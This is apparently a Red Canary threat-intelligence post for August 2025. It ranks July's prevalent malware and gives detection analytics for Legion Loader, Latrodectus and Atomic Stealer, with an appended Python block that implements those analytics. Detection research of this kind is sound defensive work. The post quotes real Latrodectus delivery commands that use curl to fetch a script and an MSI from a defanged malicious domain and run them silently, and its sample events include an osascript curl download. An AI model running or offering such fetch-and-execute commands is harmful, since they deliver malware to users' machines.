Intelligence Insights: August 2025

Precursors get preempted and NetSupport Manager gets promoted in this month’s edition of Intelligence Insights

The Red Canary Team

Highlights from July

This July marks NetSupport Manager’s first time hitting number 1 on our top 10 most prevalent threat list. Its use as a payload following Scarlet Goldfinch, paste and run, and other phishing activity placed it in the top spot this month. The other threats on our top 10 list for July are no strangers to the list, including Amber Albatross, which dropped to 2nd. CleanUpLoader carried over from its debut last month and remained in 3rd, and LummaC2 returned to the top 5 for the first time since May 2025, which was before this year’s takedown.

ICYMI: Read our new research into how DripDropper Linux malware persists in the cloud.

This month, we’d like to highlight a few threats that landed just outside our top 10 rankings. One of the things our intelligence team focuses on is differentiating initial access from final payloads. Especially in today’s as-a-service economy, where initial access brokers and delivery affiliates may work with multiple adversaries to deliver a variety of payloads, we find it helps to draw lines between these stages of an attack. When we detect and stop a threat before it can deliver its payload, sometimes we have enough information to determine what the intended payload would have been with a high level of confidence. When that happens, we track it as precursor activity for the intended payload, and do not include it in the official tallies for our top 10 threats since the payload was ultimately not seen in a customer environment.

When taking this precursor activity into account, there are three additional threats that appear in the top 10 for July; if they weren’t detected and remediated early, these payloads would have been on our top 10 list this month:

  • Legion Loader, a dropper that delivers a variety of different payloads. This would have been its debut on our top 10 list.
  • Latrodectus, a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, most recently appeared in the top 10 in May 2025.
  • Atomic Stealer, an information stealer malware family designed to target macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets. It last appeared in the top 10 in August 2024. Another member of this malware family, Poseidon Stealer, made its debut last month.

You can read more about these three threats below.

This month’s top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for July 2025:

Month's rank | Threat name | Threat description
1 | NetSupport Manager | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access
2 | Amber Albatross | Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a PyInstaller EXE with stealer capabilities
3* | CleanUpLoader | A loader designed to maintain persistence and deliver additional threats
3* | (name not captured) | Collection of Python classes to construct/manipulate network protocols
5* | (name not captured) | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives
5* | LummaC2 | Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads
5* | (name not captured) | Open source tool that dumps credentials using various techniques
8* | Scarlet Goldfinch | Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems
8* | SocGholish | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code

⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Legion Loader leverages paste and run

If its precursor activity hadn’t been detected and remediated, Legion Loader would have made its debut on our list in a tie for 8th. Also known as Satacom/CurlyGate/RobotDropper, Legion Loader has been active since at least 2019, delivering a variety of different payloads. At Red Canary we’ve observed LummaC2 and StealC as Legion Loader follow-on payloads in 2025.

Much of the Legion Loader precursor activity we saw in July 2025 is similar to a campaign that has reportedly been active since at least February 2025, which leverages fake CAPTCHAs and Cloudflare Turnstile for initial execution. In June 2025, Legion Loader was spotted as one of the payloads for malicious AI-themed search-engine-optimization-poisoned websites.

Since Legion Loader has recently been deployed via paste and run/fake CAPTCHA, that gives us a detection opportunity for its precursor delivery vehicle.

Detection opportunity: Explorer spawning msiexec with a command line containing a remote address

The following pseudo-detection analytic identifies explorer spawning msiexec with a command line containing a remote address. This could be leveraged to download a legitimate MSI file, but has also been used by threats like paste and run/fake CAPTCHA to download remotely hosted malicious scripts and code.

process_parent == (explorer.exe)
&&
process == (msiexec)
&&
command_includes ('http:', 'https:')

Latrodectus latches onto malicious ads

Latrodectus is a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, and would have landed in a tie for 8th this July if it had gone unchecked. Similar to activity observed for Legion Loader in July, Latrodectus also leveraged fake Cloudflare CAPTCHAs for distribution and execution. We’ve received reports of malicious ads leading to the fake CAPTCHA pages that went on to attempt Latrodectus delivery.

In this recent campaign, if paste and run executes successfully, it uses curl to write a script to dcf.log; ftp.exe then executes the script stored in dcf.log, which downloads Latrodectus as an MSI file.

Here’s an example of one threat that progressed to writing the Latrodectus MSI:

  • Initially, explorer.exe executed: "C:\WINDOWS\system32\cmd.exe" /i /c cd C:\Users\username && curl.exe --proto-default httP -L -o "dcf.log" jhitu[.]com/obs.php && ftp -s:dcf.log && service : 7818
  • Followed by ftp.exe executing: C:\WINDOWS\system32\cmd.exe /C cmd /c cd %appdata% && curl.exe --proto-default httP -L -o open.msi jhitu[.]com/index.php && msiexec /i open.msi /qn & powershell -w h -c exit
  • Then curl.exe made outbound netconns to 104.21.64[.]1:80 (jhitu[.]com) and subsequently wrote the Latrodectus MSI, C:\users\username\open.msi, to disk

The cmd.exe commands above are designed to execute multiple commands at one time and reach out to a remote resource, which gives us a detection opportunity.

Detection opportunity: Command Processor (cmd.exe) executing multiple commands in one line using the && operator

The following pseudo-detection analytic identifies one-liner cmd.exe commands joined by the && operator that reach out to remote resources. Adversaries, like those behind the recent Latrodectus distribution campaign, chain commands this way to download and then execute a secondary payload hosted on a remote server. The same pattern can appear in custom admin scripting, so the command line should always be investigated to determine its purpose.

process_parent == (explorer.exe)
&&
process == (cmd.exe)
&&
command_includes ('&&', 'http')

Atomic Stealer flips the osascript

Atomic Stealer would have landed in a tie for 10th this month if we included precursor activity. Also known as AMOS, it’s an information stealer malware family designed to target macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets.

Last month another stealer in this malware family, Poseidon Stealer, made its debut in the top 10 in 8th place. As we mentioned then, numerous versions and frequent rebranding make differentiating between variations in the malware family challenging. Based on our ongoing research, we assess the activity we saw in July is best tracked as Atomic Stealer.

One of the silver linings in the similarities between these stealers is the overlap in useful detection analytics for them. For example, they frequently leverage osascript in a variety of suspicious ways. We recently saw osascript used by Atomic Stealer to download and execute content, which gives us a detection opportunity.

Detection opportunity: AppleScript interpreter osascript launching with the -e switch to download and execute content

The following pseudo-detection analytic identifies the AppleScript interpreter osascript launching with the -e switch to download and execute content. macOS threats like Atomic Stealer can use this technique to launch various scripting utilities or shells, to establish persistence, or to manipulate the user via interactive messages. osascript has many legitimate uses, similar to wscript/cscript on Windows, including automated admin tasks and other internally developed scripts, so additional investigation is needed to determine whether a given use is malicious.

process == (osascript)
&&
command_includes ('-e', 'do ', ' script', 'http')
&&
command_includes ('wget', 'curl')
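The three pseudo-detection analytics in this post (explorer spawning msiexec with a remote address, cmd.exe chaining commands with && to reach a remote resource, and osascript -e downloading and executing content) expressed as Python predicates and run over a handful of process events. This is an added example, not Red Canary's code or detection engine. It assumes an event shape of parent image, process image and command line, and it reads command_includes as all-of for the ('&&', 'http') and ('-e', 'do ', ' script', 'http') lists and as any-of for the ('http:', 'https:') and ('wget', 'curl') pairs; that reading is an assumption. Sample events 0 and 1 are the two Latrodectus cmd.exe lines quoted above (defanged as printed); the others, including the example domains, are constructed for this block. Matching is case-insensitive, which is what lets the `--proto-default httP` trick in the quoted lines still satisfy the 'http' needle. Note that the second Latrodectus stage has ftp.exe as its parent, so the cmd.exe analytic as written does not fire on it; the `chain_stages` helper gives a quick triage view of what each chained one-liner runs.

```python
"""Added example (not Red Canary's code): the post's three pseudo-detection
analytics as Python predicates over constructed process events."""
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcessEvent:
    parent: str        # image name of the parent process (assumed field)
    process: str       # image name of the process itself (assumed field)
    command_line: str  # command line as recorded by the telemetry source


def _includes_any(cmd: str, needles) -> bool:
    # Case-insensitive so 'httP' in the quoted Latrodectus lines matches 'http'.
    low = cmd.lower()
    return any(n.lower() in low for n in needles)


def _includes_all(cmd: str, needles) -> bool:
    low = cmd.lower()
    return all(n.lower() in low for n in needles)


def _image_is(name: str, *candidates: str) -> bool:
    return name.lower() in candidates


def rule_explorer_msiexec_remote(ev: ProcessEvent) -> bool:
    """explorer.exe -> msiexec with http: or https: in the command line."""
    return (_image_is(ev.parent, "explorer.exe")
            and _image_is(ev.process, "msiexec", "msiexec.exe")
            and _includes_any(ev.command_line, ("http:", "https:")))


def rule_cmd_chained_remote(ev: ProcessEvent) -> bool:
    """explorer.exe -> cmd.exe whose line both chains with && and names http."""
    return (_image_is(ev.parent, "explorer.exe")
            and _image_is(ev.process, "cmd.exe")
            and _includes_all(ev.command_line, ("&&", "http")))


def rule_osascript_download_exec(ev: ProcessEvent) -> bool:
    """osascript -e 'do ... script ...' naming a URL plus wget or curl."""
    return (_image_is(ev.process, "osascript")
            and _includes_all(ev.command_line, ("-e", "do ", " script", "http"))
            and _includes_any(ev.command_line, ("wget", "curl")))


RULES = {
    "explorer_msiexec_remote": rule_explorer_msiexec_remote,
    "cmd_chained_remote": rule_cmd_chained_remote,
    "osascript_download_exec": rule_osascript_download_exec,
}

_CHAIN_OPS = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")


def chain_stages(cmd: str) -> list[str]:
    """First token of each command chained after cmd.exe's /c switch (triage aid)."""
    parts = re.split(r"\s+/c\s+", cmd, maxsplit=1, flags=re.IGNORECASE)
    body = parts[1] if len(parts) == 2 else cmd
    return [seg.split()[0] for seg in _CHAIN_OPS.split(body) if seg.strip()]


def run_rules(events) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


# Constructed sample events. Indexes 0 and 1 are the two cmd.exe lines quoted
# in the post (defanged as printed); the rest are made up for this example.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "cmd.exe",
                 r'"C:\WINDOWS\system32\cmd.exe" /i /c cd C:\Users\username && curl.exe --proto-default httP -L -o "dcf.log" jhitu[.]com/obs.php && ftp -s:dcf.log && service : 7818'),
    ProcessEvent("ftp.exe", "cmd.exe",
                 r"C:\WINDOWS\system32\cmd.exe /C cmd /c cd %appdata% && curl.exe --proto-default httP -L -o open.msi jhitu[.]com/index.php && msiexec /i open.msi /qn & powershell -w h -c exit"),
    ProcessEvent("explorer.exe", "msiexec.exe",
                 "msiexec /i https://downloads.example/agent.msi /qn"),
    ProcessEvent("explorer.exe", "msiexec.exe",
                 r"msiexec /i C:\Users\username\Downloads\agent.msi"),
    ProcessEvent("launchd", "osascript",
                 "osascript -e 'do shell script \"curl -o /tmp/update http://files.example/update\"'"),
    ProcessEvent("launchd", "osascript",
                 "osascript -e 'display dialog \"Backup finished\"'"),
    ProcessEvent("explorer.exe", "cmd.exe", "cmd.exe /c dir && echo done"),
]

if __name__ == "__main__":
    for idx, name in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
        print("  stages:", chain_stages(SAMPLE_EVENTS[idx].command_line))
```

Running the block fires exactly one rule on each of events 0, 2 and 4 and nothing on the benign local-MSI, dialog-only osascript and `dir && echo` lines. The substring needles are deliberately loose, as in the original analytics; they are a starting point for investigation, and the parent-process condition is what keeps the msiexec rule from paging on every installer a user launches from a file share.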

 
